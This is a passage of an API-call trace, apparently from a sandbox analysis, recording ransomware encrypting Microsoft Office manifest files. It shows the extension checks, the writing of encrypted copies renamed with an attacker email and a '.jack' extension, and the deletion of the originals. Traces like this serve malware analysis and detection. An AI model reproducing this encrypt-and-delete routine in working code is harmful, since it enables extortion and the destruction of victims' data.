[0205.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.658] lstrlenW (lpString=".doc") returned 4 [0205.658] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.658] lstrlenW (lpString=".docx") returned 5 [0205.658] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.658] lstrlenW (lpString=".pdf") returned 4 [0205.658] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.658] lstrlenW (lpString=".xls") returned 4 [0205.659] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString=".xlsx") returned 5 [0205.659] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.659] lstrlenW (lpString=".ppt") returned 4 [0205.659] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.659] lstrlenW (lpString=".zip") returned 4 [0205.659] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.659] lstrlenW (lpString=".rar") returned 4 [0205.659] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString=".bz2") returned 4 [0205.659] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString=".7z") returned 3 [0205.659] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.659] lstrlenW (lpString=".dbf") returned 4 [0205.659] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.659] lstrlenW (lpString=".1cd") returned 4 [0205.659] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.659] lstrlenW (lpString=".jpg") returned 4 [0205.659] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.660] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.660] lstrlenW (lpString="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 53 [0205.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.660] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=9216) returned 1 [0205.660] CloseHandle (hObject=0x3f4) returned 1 [0205.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.661] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.661] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0205.661] GetLastError () returned 0x0 [0205.661] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x2400, lpOverlapped=0x0) returned 1 [0205.866] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x2410, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x2410, lpOverlapped=0x0) returned 1 [0205.867] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.867] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.867] SetEndOfFile (hFile=0x3e4) returned 1 [0205.867] CloseHandle (hObject=0x3e4) returned 1 [0205.868] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.868] SetEndOfFile (hFile=0x3f4) returned 1 [0205.869] CloseHandle (hObject=0x3f4) returned 1 [0205.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.870] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml")) returned 1 [0205.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.870] lstrlenW (lpString=".doc") returned 4 [0205.870] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.870] lstrlenW (lpString=".docx") returned 5 [0205.870] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.870] lstrlenW (lpString=".pdf") returned 4 [0205.870] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.870] lstrlenW (lpString=".xls") returned 4 [0205.870] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.870] lstrlenW (lpString=".xlsx") returned 5 [0205.870] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.871] lstrlenW (lpString=".ppt") returned 4 [0205.871] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.871] lstrlenW (lpString=".zip") returned 4 [0205.871] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.871] lstrlenW (lpString=".rar") returned 4 [0205.871] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.871] lstrlenW (lpString=".bz2") returned 4 [0205.871] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.871] lstrlenW (lpString=".7z") returned 3 [0205.871] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.871] lstrlenW (lpString=".dbf") returned 4 [0205.871] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.871] lstrlenW (lpString=".1cd") returned 4 [0205.871] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.871] lstrlenW (lpString=".jpg") returned 4 [0205.871] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.872] lstrlenW (lpString=".doc") returned 4 [0205.872] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString=".docx") returned 5 [0205.872] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.872] lstrlenW (lpString=".pdf") returned 4 [0205.872] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString=".xls") returned 4 [0205.872] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString=".xlsx") returned 5 [0205.872] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.872] lstrlenW (lpString=".ppt") returned 4 [0205.872] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.872] lstrlenW (lpString=".zip") returned 4 [0205.872] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.872] lstrlenW (lpString=".rar") returned 4 [0205.872] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString=".bz2") returned 4 [0205.872] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.872] lstrlenW (lpString=".7z") returned 3 [0205.872] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.872] lstrlenW (lpString=".dbf") returned 4 [0205.872] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.873] lstrlenW (lpString=".1cd") returned 4 [0205.873] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 104 [0205.873] lstrlenW (lpString=".jpg") returned 4 [0205.873] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.873] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.873] lstrlenW (lpString="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 53 [0205.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.873] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=1450) returned 1 [0205.873] CloseHandle (hObject=0x3f4) returned 1 [0205.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.874] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.874] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0205.874] GetLastError () returned 0x0 [0205.874] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x5aa, lpOverlapped=0x0) returned 1 [0206.203] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x5b0, lpOverlapped=0x0) returned 1 [0206.207] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0206.207] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0206.207] SetEndOfFile (hFile=0x3e4) returned 1 [0206.207] CloseHandle (hObject=0x3e4) returned 1 [0206.208] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.208] SetEndOfFile (hFile=0x3f4) returned 1 [0206.209] CloseHandle (hObject=0x3f4) returned 1 [0206.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0206.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 1 [0206.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.210] lstrlenW (lpString=".doc") returned 4 [0206.210] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString=".docx") returned 5 [0206.210] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.210] lstrlenW (lpString=".pdf") returned 4 [0206.210] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString=".xls") returned 4 [0206.210] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString=".xlsx") returned 5 [0206.210] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.210] lstrlenW (lpString=".ppt") returned 4 [0206.210] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.210] lstrlenW (lpString=".zip") returned 4 [0206.210] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.210] lstrlenW (lpString=".rar") returned 4 [0206.210] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString=".bz2") returned 4 [0206.210] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.210] lstrlenW (lpString=".7z") returned 3 [0206.210] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString=".dbf") returned 4 [0206.211] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString=".1cd") returned 4 [0206.211] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString=".jpg") returned 4 [0206.211] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString=".doc") returned 4 [0206.211] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString=".docx") returned 5 [0206.211] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0206.211] lstrlenW (lpString=".pdf") returned 4 [0206.211] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString=".xls") returned 4 [0206.211] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString=".xlsx") returned 5 [0206.211] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0206.211] lstrlenW (lpString=".ppt") returned 4 [0206.211] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.211] lstrlenW (lpString=".zip") returned 4 [0206.211] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0206.211] lstrlenW (lpString=".rar") returned 4 [0206.211] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0206.211] lstrlenW (lpString=".bz2") returned 4 [0206.211] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0206.212] lstrlenW (lpString=".7z") returned 3 [0206.212] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0206.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.212] lstrlenW (lpString=".dbf") returned 4 [0206.212] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0206.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.212] lstrlenW (lpString=".1cd") returned 4 [0206.212] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0206.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0206.212] lstrlenW (lpString=".jpg") returned 4 [0206.212] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0206.212] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0206.212] lstrlenW (lpString="AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 53 [0206.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0206.213] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=527958) returned 1 [0206.213] CloseHandle (hObject=0x3f4) returned 1 [0206.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0206.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0206.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0206.213] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.213] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0206.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0206.214] GetLastError () returned 0x0 [0206.214] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x80e56, lpOverlapped=0x0) returned 1 [0207.012] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x80e60, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x80e60, lpOverlapped=0x0) returned 1 [0207.130] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.130] WriteFile (in: hFile=0x3e4, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.130] SetEndOfFile (hFile=0x3e4) returned 1 [0207.130] CloseHandle (hObject=0x3e4) returned 1 [0207.141] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.141] SetEndOfFile (hFile=0x3f4) returned 1 [0207.323] CloseHandle (hObject=0x3f4) returned 1 [0207.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 1 [0207.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0207.324] lstrlenW (lpString=".doc") returned 4 [0207.324] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.324] lstrlenW (lpString=".docx") returned 5 [0207.324] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.324] lstrlenW (lpString=".pdf") returned 4 [0207.324] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.324] lstrlenW (lpString=".xls") returned 4 [0207.324] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.324] lstrlenW (lpString=".xlsx") returned 5 [0207.324] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.324] lstrlenW (lpString=".ppt") returned 4 [0207.324] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.324] lstrlenW (lpString="C:\\Program Files\\Microsoft 